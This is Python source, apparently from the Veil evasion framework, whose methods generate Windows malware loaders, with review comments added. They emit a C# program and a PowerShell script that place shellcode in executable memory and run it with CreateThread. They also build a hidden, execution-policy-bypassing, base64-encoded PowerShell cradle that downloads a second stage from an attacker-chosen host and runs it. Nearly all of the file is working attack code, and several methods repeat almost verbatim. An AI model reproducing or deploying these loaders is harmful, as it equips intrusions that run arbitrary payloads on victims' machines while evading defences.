def generate(self):
    """Return C# source for a console program that executes self.shellcode in-process.

    The emitted program P/Invokes kernel32: VirtualAlloc with
    MEM_COMMIT (0x1000) and PAGE_EXECUTE_READWRITE (0x40), Marshal.Copy of
    the byte array into that buffer, CreateThread at the buffer address, then
    WaitForSingleObject(hThread, 0xFFFFFFFF) (INFINITE) so the thread runs to
    completion.  Nothing is written to disk here; the caller receives one str.
    """
    # self.shellcode.generate() is assumed to return "\xNN\xNN..." text -- it is
    # split on backslashes below.  TODO(review): confirm against the Shellcode class.
    shellcode = self.shellcode.generate()
    # split("\\") gives ["", "xNN", "xNN", ...]; dropping the empty head and
    # joining with ",0" (plus a leading "0") yields the C# initializer "0xNN,0xNN,...".
    shellcode = "0" + ",0".join(shellcode.split("\\")[1:])
    payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
    payloadCode += "namespace payload { class Program { static void Main() {\n"
    # No trailing "\n" on this line: the next statement lands on the same C# line
    # (harmless to the compiler, only affects readability of the output).
    payloadCode += "byte[] s = {"+shellcode+"};"
    # The buffer is both writable and executable (0x40); the allocation size is
    # tied to the array length.
    payloadCode += "UInt32 funcAddr = VirtualAlloc(0, (UInt32)s.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
    payloadCode += "Marshal.Copy(s, 0, (IntPtr)(funcAddr), s.Length);\n"
    payloadCode += "IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero;\n"
    payloadCode += "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);\n"
    payloadCode += "WaitForSingleObject(hThread, 0xFFFFFFFF);}\n"
    # Constants are declared after Main(); C# allows members in any order.
    payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
    # Pointer-sized values (VirtualAlloc's return, lpStartAddress) are declared
    # UInt32 rather than IntPtr, so this source only makes sense for an x86 build.
    # Kept on one line exactly as written: the literal's content is the emitted program.
    payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport(\"kernel32\")]private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); [DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); } }\n"""
    return payloadCode
def generate(self):
    """Return the printable two-line PowerShell download-cradle for this payload.

    Side effects: writes the second-stage command ("powershell -Enc <base64>")
    to a randomly named file under veil.PAYLOAD_SOURCE_PATH, and sets
    self.notes to say where it was written and which host:port (from
    self.required_options["DownloadHost"/"DownloadPort"]) the user is
    expected to serve it from.

    Returns:
        str: the x86 and x64 command lines that fetch and run the second stage.
    """
    # self.shellcode.generate() is assumed to return "\xNN\xNN..." text -- it is
    # split on backslashes below.  TODO(review): confirm against the Shellcode class.
    shellcode = self.shellcode.generate()
    # split("\\") -> ["", "xNN", ...]; join with ",0" -> ",0xNN,0xNN,..."; [1:]
    # drops the leading comma, giving a PowerShell byte-array literal.
    shellcode = ",0".join(shellcode.split("\\"))[1:]
    # Second-stage script, kept on one line exactly as written.  Add-Type compiles
    # P/Invoke stubs; VirtualAlloc reserves a fixed 0x1000 bytes with protection
    # 0x40 (PAGE_EXECUTE_READWRITE) -- note the size is NOT derived from
    # $sc.Length; the bytes are copied with one memset call each; CreateThread
    # starts execution there and Start-Sleep then blocks, presumably to keep the
    # host process alive.  Only one %s is substituted, so (shellcode) is a plain
    # parenthesised str, not a tuple.
    baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
    # Python 2 only: the `unicode` builtin does not exist on Python 3.
    # Appending a NUL after every character hand-rolls UTF-16LE for ASCII text,
    # which is what PowerShell's -EncodedCommand (-Enc) expects; any character
    # above U+00FF would be mangled by this approach.
    powershell_command = unicode(baseString)
    blank_command = ""
    for char in powershell_command:
        blank_command += char + "\x00"
    powershell_command = blank_command
    # On Python 3 b64encode() returns bytes and the str concatenations below
    # would raise TypeError -- a second reason this block is Python 2 code.
    powershell_command = base64.b64encode(powershell_command)
    payloadName = randomizer.randomString()
    # write base64 payload out to disk veil.PAYLOAD_SOURCE_PATH
    # Plain concatenation: assumes PAYLOAD_SOURCE_PATH ends with a path
    # separator -- TODO(review) confirm.  The handle is not closed if write()
    # raises; a `with open(...)` block would be the idiomatic form.
    secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
    f = open(secondStageName, 'w')
    f.write("powershell -Enc %s\n" % (powershell_command))
    f.close()
    # give notes to the user
    self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
    self.notes += " serve this on http://%s:%s\n" % (
        self.required_options["DownloadHost"][0],
        self.required_options["DownloadPort"][0],
    )
    # build our downloader shell
    # First stage: fetch the file written above over plain HTTP and pipe it to
    # iex.  There is no TLS and no integrity check on the fetched script.
    downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" % (
        self.required_options["DownloadHost"][0],
        self.required_options["DownloadPort"][0],
        payloadName)
    # Same hand-rolled UTF-16LE + base64 step as above, for the one-liner.
    powershell_command = unicode(downloaderCommand)
    blank_command = ""
    for char in powershell_command:
        blank_command += char + "\x00"
    powershell_command = blank_command
    powershell_command = base64.b64encode(powershell_command)
    # -NoP (no profile) -NonI (non-interactive) -W Hidden -Exec Bypass -Enc.
    # The base64 is what -Enc requires; it does not hide anything from
    # process-creation telemetry, which records this full command line.
    downloaderCode = "x86 powershell command:\n"
    downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
    downloaderCode += "\n\nx64 powershell command:\n"
    # "x64" means "on a 64-bit host": the SysWOW64 path is the 32-bit
    # PowerShell, presumably chosen because the second stage uses $x.ToInt32().
    downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"
    return downloaderCode
def generate(self):
    """Return the printable two-line PowerShell download-cradle for this payload.

    Unlike the sibling variant, this one constructs self.shellcode itself
    from the `shellcode` module before generating.  Side effects: writes the
    second-stage command ("powershell -Enc <base64>") to a randomly named
    file under veil.PAYLOAD_SOURCE_PATH and sets self.notes with the file
    location and the host:port the user is expected to serve it from.

    Returns:
        str: the x86 and x64 command lines that fetch and run the second stage.
    """
    # `shellcode` here is the module; the local assignment on the next line
    # shadows that name for the rest of the method.
    self.shellcode = shellcode.Shellcode()
    # Assumed to return "\xNN\xNN..." text (it is split on backslashes below).
    # TODO(review): confirm against the Shellcode class.
    shellcode = self.shellcode.generate()
    # ["", "xNN", ...] joined with ",0" -> ",0xNN,0xNN,..."; [1:] drops the
    # leading comma, giving a PowerShell byte-array literal.
    shellcode = ",0".join(shellcode.split("\\"))[1:]
    # Second-stage script, kept on one line exactly as written.  Add-Type compiles
    # P/Invoke stubs; VirtualAlloc reserves a fixed 0x1000 bytes with protection
    # 0x40 (PAGE_EXECUTE_READWRITE) -- the size is NOT derived from $sc.Length;
    # the bytes are copied with one memset call each; CreateThread starts
    # execution there and Start-Sleep then blocks, presumably to keep the host
    # process alive.  Only one %s is substituted, so (shellcode) is not a tuple.
    baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
    # Python 2 only: `unicode` does not exist on Python 3.  A NUL after every
    # character hand-rolls UTF-16LE for ASCII text, which is what PowerShell's
    # -EncodedCommand (-Enc) expects; characters above U+00FF would be mangled.
    powershell_command = unicode(baseString)
    blank_command = ""
    for char in powershell_command:
        blank_command += char + "\x00"
    powershell_command = blank_command
    # On Python 3 b64encode() returns bytes; the str concatenations below
    # would then raise TypeError.
    powershell_command = base64.b64encode(powershell_command)
    payloadName = randomizer.randomString()
    # write base64 payload out to disk veil.PAYLOAD_SOURCE_PATH
    # Plain concatenation: assumes PAYLOAD_SOURCE_PATH ends with a path
    # separator -- TODO(review) confirm.  The handle leaks if write() raises;
    # a `with open(...)` block would be the idiomatic form.
    secondStageName = veil.PAYLOAD_SOURCE_PATH + payloadName
    f = open( secondStageName , 'w')
    f.write("powershell -Enc %s\n" %(powershell_command))
    f.close()
    # give notes to the user
    self.notes = "\n\tsecondary payload written to " + secondStageName + " ,"
    self.notes += " serve this on http://%s:%s\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0],)
    # build our downloader shell
    # First stage: fetch the file written above over plain HTTP and pipe it to
    # iex.  No TLS and no integrity check on the fetched script.
    downloaderCommand = "iex (New-Object Net.WebClient).DownloadString(\"http://%s:%s/%s\")\n" %(self.required_options["DownloadHost"][0], self.required_options["DownloadPort"][0], payloadName)
    # Same hand-rolled UTF-16LE + base64 step as above, for the one-liner.
    powershell_command = unicode(downloaderCommand)
    blank_command = ""
    for char in powershell_command:
        blank_command += char + "\x00"
    powershell_command = blank_command
    powershell_command = base64.b64encode(powershell_command)
    # -NoP (no profile) -NonI (non-interactive) -W Hidden -Exec Bypass -Enc.
    # The base64 is what -Enc requires; process-creation telemetry records
    # this full command line as-is.
    downloaderCode = "x86 powershell command:\n"
    downloaderCode += "\tpowershell -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command
    downloaderCode += "\n\nx64 powershell command:\n"
    # "x64" means "on a 64-bit host": the SysWOW64 path is the 32-bit
    # PowerShell, presumably chosen because the second stage uses $x.ToInt32().
    downloaderCode += "\t%WinDir%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + powershell_command + "\n"
    return downloaderCode
def psRaw(self):
    """Return the un-encoded second-stage PowerShell script as a str.

    This is the same script body that generate() base64-encodes; here it is
    returned raw with no encoding, no file written and no self.notes update.
    """
    # self.shellcode.generate() is assumed to return "\xNN\xNN..." text -- it is
    # split on backslashes below.  TODO(review): confirm against the Shellcode class.
    shellcode = self.shellcode.generate()
    # ["", "xNN", ...] joined with ",0" -> ",0xNN,0xNN,..."; [1:] drops the
    # leading comma, giving a PowerShell byte-array literal.
    shellcode = ",0".join(shellcode.split("\\"))[1:]
    # Kept on one line exactly as written.  Add-Type compiles P/Invoke stubs;
    # VirtualAlloc reserves a fixed 0x1000 bytes with protection 0x40
    # (PAGE_EXECUTE_READWRITE) -- the size is NOT derived from $sc.Length; the
    # bytes are copied with one memset call each; CreateThread starts execution
    # there and Start-Sleep then blocks, presumably to keep the host process
    # alive.  Only one %s is substituted, so (shellcode) is not a tuple.
    baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
    return baseString
def psRaw(self):
    """Return the un-encoded second-stage PowerShell script as a str.

    Identical to the other psRaw on this page: the raw script body, with no
    base64 step, no file written and no self.notes update.
    """
    # self.shellcode.generate() is assumed to return "\xNN\xNN..." text -- it is
    # split on backslashes below.  TODO(review): confirm against the Shellcode class.
    shellcode = self.shellcode.generate()
    # ["", "xNN", ...] joined with ",0" -> ",0xNN,0xNN,..."; [1:] drops the
    # leading comma, giving a PowerShell byte-array literal.
    shellcode = ",0".join(shellcode.split("\\"))[1:]
    # Kept on one line exactly as written.  Add-Type compiles P/Invoke stubs;
    # VirtualAlloc reserves a fixed 0x1000 bytes with protection 0x40
    # (PAGE_EXECUTE_READWRITE) -- the size is NOT derived from $sc.Length; the
    # bytes are copied with one memset call each; CreateThread starts execution
    # there and Start-Sleep then blocks, presumably to keep the host process
    # alive.  Only one %s is substituted, so (shellcode) is not a tuple.
    baseString = """$c = @" [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z); [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z); [DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z); "@ $o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru $x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = %s; for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;} $z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000""" % (shellcode)
    return baseString